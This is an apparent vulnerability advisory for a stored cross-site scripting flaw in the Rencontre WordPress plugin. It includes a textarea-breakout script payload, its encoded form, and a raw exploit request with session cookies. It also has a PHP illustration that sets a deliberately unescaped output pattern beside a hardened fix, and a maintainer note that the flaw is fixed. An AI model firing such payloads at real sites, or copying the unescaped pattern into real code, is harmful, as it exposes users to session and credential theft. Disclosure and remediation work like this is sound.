# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 03/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Rencontre
# Software Link:
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps
# Description
An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin: a stored setting is rendered without escaping, so arbitrary HTML/script code is executed in the victim's browser when they visit the affected page.
# Reproduction Steps:
1. Log in to WordPress and go to the plugin's settings page
2. Under "Framework for the Facebook Like button" there is a text area
3. Enter/paste the payload and save
# POC:
Parameter: facebook
Payload: </textarea></td><script>alert('XSS')</script>//
Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F
# Exploit Request:
POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
Upgrade-Insecure-Requests: 1
# Impact:
An attacker can execute script in a victim's browser to perform various actions such as stealing cookies, session tokens, credentials and personal data, among others.
# Remediation:
Uninstall the plugin until the vulnerability has been fixed by the developer.
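The root cause described above, as an added illustration that is not the plugin's own code: a settings value saved raw and echoed straight into a textarea, beside the WordPress-API version that escapes on output and sanitizes on save. The option name, field name and nonce action are assumed.

```php
<?php
// Added illustration (not the plugin's code): how a settings field such as the
// "facebook" textarea in this advisory becomes a stored XSS, and the WordPress
// API calls that prevent it. Option name, field name and nonce action are assumed.

// --- Vulnerable pattern ---------------------------------------------------
// Saving: the raw POST value is stored unchanged.
function rencontre_demo_save_unsafe() {
    if ( isset( $_POST['facebook'] ) ) {
        update_option( 'rencontre_demo_facebook', $_POST['facebook'] ); // assumed option name
    }
}

// Rendering: the stored value is echoed straight into the textarea, so a value
// beginning with "</textarea>" closes the element and the rest is parsed as markup.
function rencontre_demo_render_unsafe() {
    $value = get_option( 'rencontre_demo_facebook', '' );
    echo '<textarea name="facebook">' . $value . '</textarea>';
}

// --- Hardened pattern -----------------------------------------------------
// Saving: require the capability and a valid nonce, then sanitize before storing
// (sanitize_textarea_field strips HTML tags but keeps line breaks).
function rencontre_demo_save_safe() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    check_admin_referer( 'rencontre_demo_save' ); // assumed nonce action
    if ( isset( $_POST['facebook'] ) ) {
        $clean = sanitize_textarea_field( wp_unslash( $_POST['facebook'] ) );
        update_option( 'rencontre_demo_facebook', $clean );
    }
}

// Rendering: esc_textarea() HTML-encodes <, >, &, " and ', so a stored
// "</textarea>" is displayed as literal text instead of closing the element.
// Output escaping is the essential fix; the save-side sanitizing is defense in depth.
function rencontre_demo_render_safe() {
    $value = get_option( 'rencontre_demo_facebook', '' );
    wp_nonce_field( 'rencontre_demo_save' );
    echo '<textarea name="facebook">' . esc_textarea( $value ) . '</textarea>';
}
```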


@boiteasite boiteasite commented Nov 5, 2019

This is now fixed. Textarea has been removed.
